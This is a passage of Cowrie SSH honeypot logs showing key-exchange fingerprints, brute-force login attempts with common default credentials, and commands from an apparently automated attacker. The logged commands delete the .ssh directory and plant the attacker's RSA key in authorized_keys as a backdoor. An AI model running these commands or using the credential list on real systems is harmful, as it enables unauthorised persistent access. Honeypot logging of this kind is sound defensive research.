6,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:53.284779Z","src_ip":"212.227.235.229","session":"2cf9bab7fd89"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":38904,"dst_ip":"1.2.3.4","dst_port":22,"session":"516a322ab6a4","protocol":"ssh","message":"New connection: 68.183.87.241:38904 (1.2.3.4:22) [session: 516a322ab6a4]","sensor":"my-vps","timestamp":"2025-08-26T04:05:53.445656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:05:53.446551Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:05:53.714824Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:54.414983Z","src_ip":"212.227.235.229","session":"35fc0621934c"}
{"eventid":"cowrie.login.success","username":"root","password":"sangoma","message":"login attempt [root/sangoma] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:05:54.845241Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:05:55.415904Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:05:55.416558Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:05:55.417359Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:55.688097Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:55.870933Z","src_ip":"212.227.235.229","session":"4425036344c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:56.120885Z","src_ip":"212.227.235.229","session":"929eb07058fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:05:56.349937Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:05:56.350608Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:05:56.621367Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:56.622211Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":38910,"dst_ip":"1.2.3.4","dst_port":22,"session":"f75331d4cae5","protocol":"ssh","message":"New connection: 68.183.87.241:38910 (1.2.3.4:22) [session: f75331d4cae5]","sensor":"my-vps","timestamp":"2025-08-26T04:05:56.872799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:05:56.873347Z","src_ip":"68.183.87.241","session":"f75331d4cae5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:05:57.133485Z","src_ip":"68.183.87.241","session":"f75331d4cae5"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:57.347718Z","src_ip":"212.227.235.229","session":"4425036344c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:57.595153Z","src_ip":"212.227.235.229","session":"2cf9bab7fd89"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:58.200980Z","src_ip":"68.183.87.241","session":"f75331d4cae5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:58.641146Z","src_ip":"212.227.235.229","session":"929eb07058fb"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:58.859982Z","src_ip":"212.227.235.229","session":"2cf9bab7fd89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34106,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec02a6dba47c","protocol":"ssh","message":"New connection: 212.227.235.229:34106 (1.2.3.4:22) [session: ec02a6dba47c]","sensor":"my-vps","timestamp":"2025-08-26T04:05:59.226189Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:59.456152Z","src_ip":"68.183.87.241","session":"f75331d4cae5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:59.655922Z","src_ip":"212.227.235.229","session":"ec02a6dba47c"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":38912,"dst_ip":"1.2.3.4","dst_port":22,"session":"67d25e26cdf2","protocol":"ssh","message":"New connection: 68.183.87.241:38912 (1.2.3.4:22) [session: 67d25e26cdf2]","sensor":"my-vps","timestamp":"2025-08-26T04:05:59.729178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:05:59.730349Z","src_ip":"68.183.87.241","session":"67d25e26cdf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:06:00.001423Z","src_ip":"68.183.87.241","session":"67d25e26cdf2"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:00.003436Z","src_ip":"212.227.235.229","session":"929eb07058fb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:06:00.479152Z","src_ip":"212.227.235.229","session":"ec02a6dba47c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:06:01.126599Z","src_ip":"68.183.87.241","session":"67d25e26cdf2"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:01.396950Z","src_ip":"68.183.87.241","session":"516a322ab6a4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:01.399098Z","src_ip":"68.183.87.241","session":"67d25e26cdf2"}
{"eventid":"cowrie.session.closed","duration":"52.4","message":"Connection lost after 52.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:01.763526Z","src_ip":"212.227.235.229","session":"75c4945481e1"}
{"eventid":"cowrie.session.closed","duration":"34.8","message":"Connection lost after 34.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:02.008311Z","src_ip":"212.227.235.229","session":"c4dd2e130b3e"}
{"eventid":"cowrie.session.closed","duration":"53.2","message":"Connection lost after 53.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:02.276435Z","src_ip":"212.227.235.229","session":"b0a6aae16b74"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:06.704307Z","src_ip":"212.227.235.229","session":"35fc0621934c"}
{"eventid":"cowrie.session.closed","duration":"15.7","message":"Connection lost after 15.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:07.973060Z","src_ip":"212.227.235.229","session":"35fc0621934c"}
